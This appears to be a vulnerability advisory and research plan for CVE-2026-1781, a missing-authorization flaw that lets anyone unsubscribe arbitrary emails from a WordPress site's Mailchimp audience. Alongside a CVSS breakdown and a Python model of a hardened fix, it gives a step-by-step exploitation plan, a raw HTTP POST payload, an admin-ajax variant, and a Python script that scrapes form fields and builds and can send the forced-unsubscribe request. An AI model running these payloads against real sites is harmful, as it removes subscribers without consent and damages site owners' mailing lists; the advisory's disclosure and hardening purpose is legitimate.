CVE-2026-1781

MC4WP: Mailchimp for WordPress <= 4.11.1 - Missing Authorization to Unauthenticated Arbitrary Subscription Deletion

Severity: medium (Missing Authorization)
CVSS Score: 6.5
Patched in: 4.12.0
Time to patch: 1d

Description

The MC4WP: Mailchimp for WordPress plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 4.11.1. This is due to the plugin trusting the `_mc4wp_action` POST parameter without validation, allowing unauthenticated attackers to force the form to process unsubscribe actions instead of subscribe actions. This makes it possible for unauthenticated attackers to arbitrarily unsubscribe any email address from the connected Mailchimp audience via the `_mc4wp_action` parameter, provided they can obtain the form ID (which is publicly exposed in the HTML source).

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: Low

Technical Details

Affected versions: <= 4.11.1
Published: March 10, 2026
Last updated: March 11, 2026
Affected plugin: mailchimp-for-wp

What Changed in the Fix

Changes introduced in v4.12.0

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan focuses on the Missing Authorization vulnerability in the MC4WP: Mailchimp for WordPress plugin, which allows unauthenticated attackers to unsubscribe any email address from a Mailchimp audience by manipulating the _mc4wp_action parameter in a form submission.

1. Vulnerability Summary

The vulnerability exists in the front-end form processing logic of the plugin. When a user submits a sign-up form, the plugin determines the action to take (subscribe or unsubscribe) from the _mc4wp_action POST parameter. In affected versions (<= 4.11.1), the plugin does not verify whether the submitter is authorized to perform an unsubscribe action. Because the plugin is designed to accept unauthenticated sign-ups, it processes these requests from any visitor. An attacker can therefore craft a request that overrides the intended subscribe action with unsubscribe, removing any known email address from the connected Mailchimp audience.

2. Attack Vector Analysis

  • Endpoint: Any public-facing page where a Mailchimp for WordPress form is embedded.
  • Method: POST
  • Vulnerable Parameter: _mc4wp_action
  • Required Authentication: None (Unauthenticated).
  • Preconditions:
    1. The attacker must know the _mc4wp_form_id (publicly visible in the HTML source).
    2. The plugin must be connected to a valid Mailchimp API key.
    3. The victim's email address must already be subscribed to the audience associated with the form.

3. Code Flow (Inferred from Source & Behavior)

  1. Entry Point: MC4WP_Form_Listener (referenced in autoload.php) is loaded and hooks into template_redirect, init, or wp_loaded to listen for form submissions.
  2. Request Detection: The listener checks for the presence of the _mc4wp_form_id POST parameter.
  3. Action Determination: The listener looks for _mc4wp_action.
    • If absent, it defaults to subscribe.
    • If present, it adopts the value provided in the request without checking permissions.
  4. Logic Branching: The code passes the action to MC4WP_Form::execute($action, $data) or a similar processing method.
  5. Sink: The plugin uses the MC4WP_API_V3 class (referenced in autoload.php) to communicate with the Mailchimp API. If the action is unsubscribe, it sends a request to Mailchimp to update the member's status to unsubscribed.
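The dispatch step in the flow above, modelled in Python as an added example. This is not the plugin's PHP and not the v4.12.0 patch (whose diff is not shown on this page); it contrasts the vulnerable pattern, where the request decides the action, with one defensible hardened design, where the form's server-side configuration decides and a client-supplied value that disagrees is rejected. FORMS, its setting names, and the in-memory audience are constructed stand-ins.

```python
"""Action resolution in the form listener: vulnerable vs. hardened.

Added example modelled in Python; it is not the plugin's PHP and not the
v4.12.0 patch. The vulnerable resolver adopts whatever _mc4wp_action the
request carries. The hardened one takes the action from the form's
server-side configuration and rejects a client value that disagrees, so an
unauthenticated visitor can only do what the site owner configured the form
to do. FORMS and the audience dict are constructed stand-ins.
"""


class Rejected(Exception):
    """Raised when a submission fails the server-side authorization decision."""


# Constructed stand-in for stored mc4wp-form posts and their settings
# (the real storage layout and setting names are not shown on this page).
FORMS = {
    "123": {"action": "subscribe", "list_id": "a1b2c3d4e5"},
    "456": {"action": "unsubscribe", "list_id": "a1b2c3d4e5"},  # an explicit unsubscribe form
}

ALLOWED_ACTIONS = {"subscribe", "unsubscribe"}


def vulnerable_resolve_action(post):
    """<= 4.11.1 pattern: the request decides, defaulting to subscribe."""
    if post.get("_mc4wp_form_id") not in FORMS:
        raise Rejected("unknown form id")
    return post.get("_mc4wp_action", "subscribe")


def hardened_resolve_action(post):
    """The form's configured action is the only source of truth.

    A client-supplied _mc4wp_action is tolerated only when it matches, which
    keeps old markup working without ever letting the client escalate a
    subscribe form into an unsubscribe request.
    """
    form = FORMS.get(post.get("_mc4wp_form_id"))
    if form is None:
        raise Rejected("unknown form id")
    action = form["action"]
    if action not in ALLOWED_ACTIONS:
        raise Rejected(f"form misconfigured: {action!r}")
    claimed = post.get("_mc4wp_action")
    if claimed is not None and claimed != action:
        raise Rejected(f"client asked for {claimed!r}, form is configured for {action!r}")
    return action


def process(post, resolver, audience):
    """Simulated Mailchimp sink: apply the resolved action to an in-memory audience.

    Returns the member's status after processing (None if unknown).
    """
    action = resolver(post)
    email = post["EMAIL"].strip().lower()
    if action == "subscribe":
        audience[email] = "subscribed"
    elif action == "unsubscribe":
        if email in audience:
            audience[email] = "unsubscribed"
    else:
        raise Rejected(f"unsupported action {action!r}")
    return audience.get(email)


def is_rejected(post, resolver, audience):
    """True if the resolver refuses the submission (audience left untouched)."""
    try:
        process(post, resolver, audience)
    except Rejected:
        return True
    return False


if __name__ == "__main__":
    attack = {"_mc4wp_form_id": "123", "_mc4wp_action": "unsubscribe", "EMAIL": "victim@example.com"}
    audience = {"victim@example.com": "subscribed"}
    print("vulnerable:", process(attack, vulnerable_resolve_action, dict(audience)))
    print("hardened rejected:", is_rejected(attack, hardened_resolve_action, dict(audience)))
```

The point of the hardened resolver is that the authorization decision never depends on a value the visitor controls: form 123 can only subscribe, form 456 can only unsubscribe, and the hidden field is at most a consistency hint.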

4. Nonce Acquisition Strategy

Mailchimp for WordPress forms are designed for high conversion and, by default, do not require a WordPress nonce for standard sign-ups. This is confirmed by config/default-form-content.php, which contains only the email field and the submit button.

However, the plugin employs some anti-spam measures:

  1. Honeypot: A hidden field (often named _mc4wp_honeypot) that must be empty.
  2. Timestamp: A hidden field _mc4wp_timestamp containing a Unix timestamp.

Strategy:

  1. Navigate to a page containing the form.
  2. Extract the _mc4wp_form_id from the hidden input.
  3. Extract any anti-spam tokens (if present) from the HTML.
  4. No JavaScript-localized nonce is required for this specific exploit.

5. Exploitation Strategy

The goal is to force an unsubscribe action on an existing subscriber.

Step-by-Step Plan:

  1. Identify Form: Locate a page with an MC4WP form.
  2. Extract Parameters: Read the value of the hidden input _mc4wp_form_id from the page source (view-source or a DOM query in the browser console).
  3. Craft Payload:
    • _mc4wp_form_id: [Extracted ID]
    • _mc4wp_action: unsubscribe
    • EMAIL: [Target Email Address]
    • _mc4wp_timestamp: [Current Unix Timestamp] (optional, but recommended)
  4. Execute Request: Send the POST request to the page URL with any HTTP client (curl, Burp, or a script).

Payload (URL-Encoded):

POST /target-page/ HTTP/1.1
Host: target.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

_mc4wp_form_id=123&_mc4wp_action=unsubscribe&EMAIL=victim@example.com&_mc4wp_timestamp=1738848000
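Steps 1 to 4 above as one script, added here as an example; it is not part of the original research plan and not plugin code. It parses the hidden inputs out of a constructed copy of the form markup, replays them with _mc4wp_action overridden to unsubscribe, and also builds the admin-ajax.php variant used by AJAX-enabled forms. SAMPLE_HTML is constructed (the extra _mc4wp_form_element_id field is assumed), and the sending helper is included but never called, so the script runs offline.

```python
"""Reproduction helper for the _mc4wp_action override.

Added example, not code from the plugin or the original research plan. It
parses the MC4WP form's hidden inputs out of a page, replays them with the
action overridden to "unsubscribe", and returns the URL-encoded body. It runs
offline against the constructed SAMPLE_HTML below; send_payload() is the only
network step and is never called here.
"""
from html.parser import HTMLParser
from urllib.parse import urlencode
import urllib.request

# Constructed stand-in for the markup an MC4WP form renders. Only the hidden
# inputs matter; their names follow the research plan above, and
# _mc4wp_form_element_id is an assumed extra hidden field.
SAMPLE_HTML = """
<form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-123" method="post" action="/newsletter/">
  <p><input type="email" name="EMAIL" placeholder="Your email address" required></p>
  <p><input type="submit" value="Sign up"></p>
  <input type="hidden" name="_mc4wp_timestamp" value="1738848000">
  <input type="hidden" name="_mc4wp_form_id" value="123">
  <input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1">
  <div style="display: none;"><input type="text" name="_mc4wp_honeypot" value="" tabindex="-1"></div>
</form>
"""


class Mc4wpFormCollector(HTMLParser):
    """Collects name/value of every <input> inside the first .mc4wp-form."""

    def __init__(self):
        super().__init__()
        self.in_form = False
        self.done = False
        self.action = None
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        classes = (a.get("class") or "").split()
        if tag == "form" and "mc4wp-form" in classes and not self.done:
            self.in_form = True
            self.action = a.get("action")
        elif self.in_form and tag == "input" and a.get("name"):
            self.fields[a["name"]] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form" and self.in_form:
            self.in_form = False
            self.done = True


def extract_form(html):
    """Return (fields, form action URL) for the first MC4WP form on the page."""
    parser = Mc4wpFormCollector()
    parser.feed(html)
    parser.close()
    if "_mc4wp_form_id" not in parser.fields:
        raise ValueError("no MC4WP form found on page")
    return parser.fields, parser.action


def build_payload(fields, target_email, ajax=False):
    """URL-encoded POST body that forces an unsubscribe of target_email.

    ajax=True produces the admin-ajax.php variant (action=mc4wp_submit_form)
    instead of a plain POST back to the page.
    """
    body = {}
    if ajax:
        body["action"] = "mc4wp_submit_form"
    body["_mc4wp_form_id"] = fields["_mc4wp_form_id"]
    body["_mc4wp_action"] = "unsubscribe"  # the client-controlled value the plugin trusted
    body["EMAIL"] = target_email
    # Replay every other _mc4wp_* field exactly as rendered so the assumed
    # anti-spam checks (timestamp age, empty honeypot) are unaffected.
    for name, value in fields.items():
        if name.startswith("_mc4wp_") and name not in body:
            body[name] = value
    return urlencode(body)


def send_payload(url, body, timeout=10):
    """Deliver the body as a form POST. Not called in this offline example."""
    req = urllib.request.Request(
        url,
        data=body.encode(),
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    fields, action = extract_form(SAMPLE_HTML)
    print("form action:", action)
    print(build_payload(fields, "victim@example.com"))
    print(build_payload(fields, "victim@example.com", ajax=True))
```

Against a live target the body returned by build_payload is what goes into the request shown above; the form's action attribute tells you which URL to post to (normally the same page, or admin-ajax.php for the AJAX variant).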

6. Test Data Setup

  1. API Connection: Connect the plugin to a Mailchimp account (or a mock API).
  2. Create Form: Create a sign-up form via the plugin admin.
  3. Placement: Add the form to a post/page using the [mc4wp_form] shortcode.
  4. Add Subscriber: Manually add victim@example.com to the Mailchimp audience (ensure status is subscribed).
  5. Enable Logging: In plugin settings, ensure "Logging" is enabled to verify the action.

7. Expected Results

  • Response: The page should reload and likely display a success message associated with unsubscription (e.g., "You have been unsubscribed").
  • Mailchimp State: The email victim@example.com should have its status changed from subscribed to unsubscribed in the Mailchimp Audience dashboard.
  • Plugin Logs: The plugin's internal logs should show an unsubscribe event for the specified email.

8. Verification Steps

  1. Database Check: Check the wp_posts table where post_type = 'mc4wp-form' to confirm the form ID existence.
  2. Plugin Debug Log: Use wp-cli to read the MC4WP debug log (if defined in the settings or filesystem).
    • cat wp-content/uploads/mc4wp-debug.log (path may vary).
  3. Mailchimp Verification: If possible, use MC4WP_API_V3 directly via wp eval to check the member status:
    wp eval '$api = new MC4WP_API_V3("YOUR_API_KEY"); print_r($api->get_subscriber("AUDIENCE_ID", "victim@example.com"));'

9. Alternative Approaches

  • Gutenberg Block: If the standard shortcode is not used, target the form generated by the mailchimp-for-wp/form Gutenberg block.
  • AJAX Submission: Some configurations use AJAX. If the form has the mc4wp-ajax class, the request should be sent to admin-ajax.php with action=mc4wp_submit_form.
    • Payload: action=mc4wp_submit_form&_mc4wp_form_id=[ID]&_mc4wp_action=unsubscribe&EMAIL=[EMAIL]
  • Different Actions: Test if other actions like delete are supported by the _mc4wp_action parameter, although unsubscribe is the most common for front-end listeners.
